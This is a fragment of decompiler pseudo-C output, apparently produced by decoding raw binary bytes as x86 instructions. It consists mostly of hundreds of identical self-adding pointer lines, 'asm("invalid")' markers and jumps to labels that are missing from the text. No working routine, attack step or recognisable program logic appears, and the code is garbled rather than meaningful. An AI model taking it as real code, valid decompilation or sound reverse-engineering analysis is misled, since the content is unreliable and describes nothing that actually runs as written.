				 *((intOrPtr*)(_t1270 + _t1276)) =  *((intOrPtr*)(_t1270 + _t1276)) + _t1237;
				_t915 = (_t912 & 0x0000003e) + 2;
				 *_t915 =  *_t915 + _t915;
				_pop(ds);
				 *((intOrPtr*)(_t915 + _t915)) =  *((intOrPtr*)(_t915 + _t915)) + _t1237;
				 *_t915 =  *_t915 + _t915;
				_t916 = _t915 + 1;
				_t1194 = _t1193 + _t1193;
				asm("invalid");
				 *_t916 =  *_t916 + 1;
				 *_t916 =  *_t916 + _t916;
				 *_t916 =  *_t916 + _t916;
				 *_t916 =  *_t916 + _t916;
				_t917 = _t916 + _t1219;
				asm("sbb [eax], eax");
				asm("adc [edx+0x71], bl");
				 *((intOrPtr*)(_t1237 + _t1270 - 0xffc0)) =  *((intOrPtr*)(_t1237 + _t1270 - 0xffc0)) + _t1237;
				asm("invalid");
				 *_t917 =  *_t917 + _t917;
				 *_t917 =  *_t917 + _t917;
				_t918 =  *0x20004019;
				asm("sbb [eax], eax");
				if( *_t917 >= 0) {
					 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1237;
					_t918 = _t918 + 2;
					 *((intOrPtr*)(_t1219 + _t1237 + 0x40)) =  *((intOrPtr*)(_t1219 + _t1237 + 0x40)) + _t1194;
					 *_t918 =  *_t918 + _t918;
					 *_t918 =  *_t918 + _t918;
					 *_t918 =  *_t918 + _t918;
					 *_t918 =  *_t918 + _t918;
				}
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t918 =  *_t918 + _t918;
				 *_t1219 =  *_t1219 + _t918;
				 *_t1219 =  *_t1219 + _t1237;
				 *((intOrPtr*)(_t918 + 0x35)) =  *((intOrPtr*)(_t918 + 0x35)) + _t918;
				_t919 = _t918 + 1;
				 *_t919 =  *_t919 + _t919;
				 *_t919 =  *_t919 + _t919;
				 *_t919 =  *_t919 + _t1194;
				asm("adc eax, [edx]");
				asm("invalid");
				asm("invalid");
				 *_t919 =  *_t919 + _t919;
				 *_t919 =  *_t919 + _t919;
				asm("in al, 0x38");
				_t920 = _t919 + 1;
				 *((intOrPtr*)(_t1219 + 0x42)) =  *((intOrPtr*)(_t1219 + 0x42)) + _t1194;
				 *_t920 =  *_t920 + _t920;
				 *_t920 =  *_t920 + _t920;
				 *_t920 =  *_t920 + _t1219;
				 *_t920 =  *_t920 + _t920;
				 *_t920 =  *_t920 + _t920;
				 *_t920 =  *_t920 + _t920;
				 *_t920 =  *_t920 + _t920;
				 *_t920 =  *_t920 + _t920;
				asm("aam 0x1a");
				_t921 = _t920 + 1;
				 *_t1219 =  *_t1219 + _t921;
				 *_t921 =  *_t921 + _t921;
				 *((intOrPtr*)(_t1219 + 0x40 + _t921 * 2)) =  *((intOrPtr*)(_t1219 + 0x40 + _t921 * 2)) + _t1237;
				 *_t921 =  *_t921 + _t921;
				 *_t921 =  *_t921 + _t921;
				_t922 = _t921 + _t1237;
				asm("sbb al, [eax]");
				 *_t922 =  *_t922 + _t922;
				 *_t922 =  *_t922 + _t922;
				asm("fcomp qword [edx]");
				_t923 = _t922 + 1;
				 *_t923 =  *_t923 + _t923;
				 *_t923 =  *_t923 + _t923;
				_t924 = _t923 + _t1194;
				asm("sbb al, [eax]");
				 *_t924 =  *_t924 + _t924;
				 *_t924 =  *_t924 + _t924;
				asm("fcomp qword [edx]");
				_t925 = _t924 + 1;
				 *_t925 =  *_t925 + _t925;
				 *0x6C006877 =  *((intOrPtr*)(0x6c006877)) + _t1237;
				 *((intOrPtr*)(_t1194 + _t1194)) =  *((intOrPtr*)(_t1194 + _t1194)) + _t925;
				_t927 = _t925 + 1 + _t1237;
				 *_t1237 =  *_t1237 - _t927;
				 *_t927 =  *_t927 + _t927;
				 *_t927 =  *_t927 + _t927;
				_t1293 = _t1292 - 1;
				asm("lahf");
				if ( *_t927 <= 0) goto L54;
				_t1220 = _t1219 + 1;
				_t928 = _t927 + 1;
				 *((intOrPtr*)(_t1220 + 0x40 + _t928 * 2)) =  *((intOrPtr*)(_t1220 + 0x40 + _t928 * 2)) + _t1237;
				 *_t928 =  *_t928 + _t928;
				_pop(ds);
				 *((intOrPtr*)(_t928 + _t928)) =  *((intOrPtr*)(_t928 + _t928)) + _t1237;
				 *_t928 =  *_t928 + _t928;
				_t929 = _t928 + 1;
				_t1195 = _t1194 + _t1194;
				asm("invalid");
				 *_t929 =  *_t929 + 1;
				 *_t929 =  *_t929 + _t929;
				 *_t929 =  *_t929 + _t929;
				 *_t929 =  *_t929 + _t929;
				 *((intOrPtr*)(_t1195 + _t1195)) =  *((intOrPtr*)(_t1195 + _t1195)) + _t929;
				_t930 = _t929 + 1;
				 *_t930 =  *_t930 + _t1237;
				_pop(_t1238);
				if ( *_t930 >= 0) goto L55;
				_t931 = _t1293;
				_t1294 = _t930;
				asm("invalid");
				asm("invalid");
				 *_t931 =  *_t931 + _t931;
				 *_t931 =  *_t931 + _t931;
				asm("fcomp qword [edx]");
				_t932 = _t931 + 1;
				 *((intOrPtr*)(_t1238 + _t1195 + 0x40)) =  *((intOrPtr*)(_t1238 + _t1195 + 0x40)) + _t1195;
				 *((intOrPtr*)(_t932 + 0x11)) =  *((intOrPtr*)(_t932 + 0x11)) + _t1238;
				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1238;
				_t934 = _t932 + 2;
				 *((intOrPtr*)(_t1220 + _t1238 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1238 + 0x40)) + _t1195;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t1220 =  *_t1220 + _t934;
				 *0x40356000 =  *0x40356000 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t1195;
				_t1196 = _t1195 + _t1195;
				asm("invalid");
				 *_t934 =  *_t934 + 1;
				 *_t934 =  *_t934 + _t934;
				 *((intOrPtr*)(_t1276 + _t1276 + 0x206c0040)) =  *((intOrPtr*)(_t1276 + _t1276 + 0x206c0040)) + _t934;
				_t1240 = _t1238 + 2;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *((intOrPtr*)(_t934 + 0x7348)) =  *((intOrPtr*)(_t934 + 0x7348)) + _t1196;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t1240;
				asm("sbb al, 0x40");
				 *_t1220 =  *_t1220 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *((intOrPtr*)(_t1276 + 0xb6)) =  *((intOrPtr*)(_t1276 + 0xb6)) + _t1240;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t1240;
				asm("sbb al, 0x40");
				 *_t1220 =  *_t1220 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t1196;
				asm("sbb al, 0x40");
				 *_t934 =  *_t934 + _t934;
				 *_t934 =  *_t934 + _t934;
				 *((intOrPtr*)(_t1294 + _t1196)) =  *((intOrPtr*)(_t1294 + _t1196)) + _t1240;
				_t935 = _t934 + 1;
				 *_t1220 =  *_t1220 + _t935;
				 *_t935 =  *_t935 + _t935;
				 *_t935 =  *_t935 + _t1196;
				asm("sbb al, 0x40");
				 *_t935 =  *_t935 + _t935;
				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1240;
				 *((intOrPtr*)(_t935 + 0x1c)) =  *((intOrPtr*)(_t935 + 0x1c)) + _t935;
				_t936 = _t935 + 1;
				 *((intOrPtr*)(_t1276 + 0xec)) =  *((intOrPtr*)(_t1276 + 0xec)) + _t936;
				_t1241 = _t1240 + 1;
				 *_t936 =  *_t936 + _t936;
				 *_t936 =  *_t936 + _t936;
				_t313 = _t1196 + _t1220;
				 *_t313 =  *((intOrPtr*)(_t1196 + _t1220)) + _t1241;
				if ( *_t313 <= 0) goto L56;
				_t937 = _t936 + 1;
				 *((intOrPtr*)(_t1276 + 0xb6)) =  *((intOrPtr*)(_t1276 + 0xb6)) + _t1241;
				 *_t937 =  *_t937 + _t937;
				ds = ss;
				 *((intOrPtr*)(_t937 + _t937)) =  *((intOrPtr*)(_t937 + _t937)) + _t1241;
				 *_t937 =  *_t937 + _t937;
				_t938 = _t937 + 1;
				_t1197 = _t1196 + _t1196;
				asm("invalid");
				 *_t938 =  *_t938 + 1;
				 *_t938 =  *_t938 + _t938;
				 *_t938 =  *_t938 + _t938;
				 *_t938 =  *_t938 + _t938;
				 *((intOrPtr*)(_t938 + 0x1c)) =  *((intOrPtr*)(_t938 + 0x1c)) + _t938;
				_t939 = _t938 + 1;
				 *_t939 =  *_t939 + _t1241;
				_pop(_t1242);
				if ( *_t939 >= 0) goto L57;
				_t940 = _t1294;
				_t1295 = _t939;
				asm("invalid");
				asm("invalid");
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				asm("sbb [eax+eax*2], bl");
				_t326 = _t940 + 0x7000401b;
				 *_t326 =  *((intOrPtr*)(_t940 + 0x7000401b)) + _t1197;
				asm("adc [eax], eax");
				if( *_t326 > 0) {
					_t940 = _t940 + 1;
					 *((intOrPtr*)(_t1220 + _t1242 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1242 + 0x40)) + _t1197;
					 *_t940 =  *_t940 + _t940;
					 *_t940 =  *_t940 + _t940;
					 *_t940 =  *_t940 + _t940;
					 *_t940 =  *_t940 + _t940;
					 *_t940 =  *_t940 + _t940;
					 *_t940 =  *_t940 + _t940;
				}
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t940 =  *_t940 + _t940;
				 *_t1220 =  *_t1220 + _t940;
				 *0x76 =  *0x76 + _t1220;
				 *((intOrPtr*)(_t940 + 0x35)) =  *((intOrPtr*)(_t940 + 0x35)) + _t940;
				_t941 = _t940 + 1;
				 *_t941 =  *_t941 + _t941;
				 *_t941 =  *_t941 + _t941;
				 *((intOrPtr*)(_t941 - 0xffbded)) =  *((intOrPtr*)(_t941 - 0xffbded)) + _t1197;
				asm("invalid");
				 *_t941 =  *_t941 + 1;
				 *_t941 =  *_t941 + _t941;
				 *((intOrPtr*)(_t941 + 0x213400b6)) =  *((intOrPtr*)(_t941 + 0x213400b6)) + _t941;
				_t1243 = _t1242 + 1;
				 *_t941 =  *_t941 + _t941;
				 *_t941 =  *_t941 + _t941;
				_t942 = _t941 + _t1197;
				 *_t942 =  *_t942 + _t942;
				 *_t942 =  *_t942 + _t942;
				 *_t942 =  *_t942 + _t942;
				 *_t942 =  *_t942 + _t942;
				 *_t942 =  *_t942 + _t942;
				_t1296 = _t1295 - 1;
				asm("sbb eax, 0x10040");
				 *_t942 =  *_t942 + _t942;
				asm("aam 0x40");
				_t943 = _t942 + 1;
				 *_t943 =  *_t943 + _t943;
				 *_t943 =  *_t943 + _t943;
				 *((intOrPtr*)(_t1280 + _t1197 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1197 + 0x40)) + _t1220;
				 *_t1220 =  *_t1220 + _t943;
				 *_t943 =  *_t943 + _t943;
				 *((intOrPtr*)(_t1280 + _t1197 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1197 + 0x40)) + _t1243;
				 *_t943 =  *_t943 + _t943;
				 *_t943 =  *_t943 + _t943;
				 *((intOrPtr*)(_t943 + 0x1d)) =  *((intOrPtr*)(_t943 + 0x1d)) + _t1243;
				_t944 = _t943 + 1;
				 *_t1220 =  *_t1220 + _t944;
				 *_t944 =  *_t944 + _t944;
				 *((intOrPtr*)(_t1280 + _t1197 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1197 + 0x40)) + _t1243;
				 *_t944 =  *_t944 + _t944;
				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1243;
				 *((intOrPtr*)(_t1280 + _t1197 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1197 + 0x40)) + _t1197;
				_t945 = _t944 + _t1197;
				asm("aaa");
				_t1244 = _t1243 + 1;
				 *_t945 =  *_t945 + _t945;
				 *_t945 =  *_t945 + _t945;
				 *_t945 =  *_t945 + _t1197;
				asm("in al, 0x40");
				_t949 = _t945 + 1 + _t1244 + 2;
				 *_t949 =  *_t949 + _t949;
				_pop(ds);
				 *((intOrPtr*)(_t949 + _t949)) =  *((intOrPtr*)(_t949 + _t949)) + _t1244;
				 *_t949 =  *_t949 + _t949;
				_t950 = _t949 + 1;
				_t1198 = _t1197 + _t1197;
				asm("invalid");
				 *_t950 =  *_t950 + 1;
				 *_t950 =  *_t950 + _t950;
				 *_t950 =  *_t950 + _t950;
				 *_t950 =  *_t950 + _t950;
				 *((intOrPtr*)(_t1280 + _t1198 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1198 + 0x40)) + _t1198;
				 *_t950 =  *_t950 + _t1244;
				_pop(_t1245);
				if ( *_t950 >= 0) goto L60;
				_t951 = _t1296;
				_t1297 = _t950;
				asm("invalid");
				asm("invalid");
				 *_t951 =  *_t951 + _t951;
				 *_t951 =  *_t951 + _t951;
				_push(_t1297);
				asm("sbb eax, 0x1cd40040");
				_t952 = _t951 + 1;
				 *((intOrPtr*)(_t952 + 0x11)) =  *((intOrPtr*)(_t952 + 0x11)) + _t1245;
				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1245;
				_t954 = _t952 + 2;
				 *((intOrPtr*)(_t1220 + _t1245 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1245 + 0x40)) + _t1198;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t954 =  *_t954 + _t954;
				 *_t1220 =  *_t1220 + _t954;
				 *_t1276 =  *_t1276 + _t954;
				 *((intOrPtr*)(_t954 + 0x35)) =  *((intOrPtr*)(_t954 + 0x35)) + _t954;
				_t955 = _t954 + 1;
				 *_t955 =  *_t955 + _t955;
				 *_t955 =  *_t955 + _t955;
				_t956 = _t955 + _t1198;
				asm("adc eax, 0xffff0042");
				asm("invalid");
				 *_t956 =  *_t956 + _t956;
				 *_t956 =  *_t956 + _t956;
				asm("aam 0x36");
				_t957 = _t956 + 1;
				 *((intOrPtr*)(_t957 + 0x4220)) =  *((intOrPtr*)(_t957 + 0x4220)) + _t957;
				 *_t957 =  *_t957 + _t957;
				 *_t957 =  *_t957 + _t1220;
				_t958 = _t957 - 1;
				if (_t958 >= 0) goto L61;
				 *_t958 =  *_t958 + _t958;
				 *_t958 =  *_t958 + _t958;
				 *_t958 =  *_t958 + _t958;
				 *_t958 =  *_t958 + _t958;
				 *_t958 =  *_t958 + _t958;
				 *_t958 =  *_t958 + _t958;
				 *_t1276 = _t1198;
				_t959 = _t958 + 1;
				 *_t1220 =  *_t1220 + _t959;
				 *_t959 =  *_t959 + _t959;
				 *((intOrPtr*)(_t1276 + 0xb6)) =  *((intOrPtr*)(_t1276 + 0xb6)) + _t1245;
				 *_t959 =  *_t959 + _t959;
				 *_t1276 = _t1198;
				_t960 = _t959 + 1;
				 *_t1220 =  *_t1220 + _t960;
				 *_t960 =  *_t960 + _t960;
				 *((intOrPtr*)(_t960 + 0x401e)) =  *((intOrPtr*)(_t960 + 0x401e)) + _t1245;
				 *_t960 =  *_t960 + _t960;
				 *((intOrPtr*)(_t1276 + _t1198 + 0x10040)) =  *((intOrPtr*)(_t1276 + _t1198 + 0x10040)) + _t1220;
				 *_t960 =  *_t960 + _t960;
				_push(ds);
				_t961 = _t960 + 1;
				 *_t961 =  *_t961 + _t961;
				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1245;
				_t393 = _t961 + 0x2000401e;
				 *_t393 =  *((intOrPtr*)(_t961 + 0x2000401e)) + _t1198;
				if( *_t393 <= 0) {
					 *_t961 =  *_t961 + _t961;
					 *_t961 =  *_t961 + _t961;
					 *((intOrPtr*)(_t1198 +  &(_t1220[0xfa9001d]))) =  *((intOrPtr*)(_t1198 +  &(_t1220[0xfa9001d]))) + _t961;
					_t1167 = _t961 + 1;
					 *((intOrPtr*)(_t1276 + 0x4000b6)) =  *((intOrPtr*)(_t1276 + 0x4000b6)) + _t1245;
					_pop(ds);
					 *((intOrPtr*)(_t1167 + _t1167)) =  *((intOrPtr*)(_t1167 + _t1167)) + _t1245;
					 *_t1167 =  *_t1167 + _t1167;
					_t1168 = _t1167 + 1;
					_t1198 = _t1198 + _t1198;
					asm("invalid");
					 *_t1168 =  *_t1168 + 1;
					 *_t1168 =  *_t1168 + _t1168;
					 *_t1168 =  *_t1168 + _t1168;
					 *_t1168 =  *_t1168 + _t1168;
					_t407 = _t1168 + 0x1000401e;
					 *_t407 =  *((intOrPtr*)(_t1168 + 0x1000401e)) + _t1198;
					_pop(_t1245);
					if ( *_t407 >= 0) goto L63;
					_t1169 = _t1297;
					_t1297 = _t1168;
					asm("invalid");
					asm("invalid");
					 *_t1169 =  *_t1169 + _t1169;
					 *_t1169 =  *_t1169 + _t1169;
					_push(ds);
					_t961 = _t1169 + 1;
					 *_t961 =  *_t961 + _t1245;
				}
				_t962 = _t961 + 1;
				 *((intOrPtr*)(_t962 + 0x11)) =  *((intOrPtr*)(_t962 + 0x11)) + _t1245;
				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1245;
				_t964 = _t962 + 2;
				 *((intOrPtr*)(_t1220 + _t1245 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1245 + 0x40)) + _t1198;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t964 =  *_t964 + _t964;
				 *_t1220 =  *_t1220 + _t964;
				 *_t1245 =  *_t1245 + _t1220;
				 *((intOrPtr*)(_t964 + 0x35)) =  *((intOrPtr*)(_t964 + 0x35)) + _t964;
				_t965 = _t964 + 1;
				 *_t965 =  *_t965 + _t965;
				 *_t965 =  *_t965 + _t965;
				_t966 = _t965 + _t1198;
				asm("adc al, 0x42");
				asm("invalid");
				 *_t966 =  *_t966 + 1;
				 *_t966 =  *_t966 + _t966;
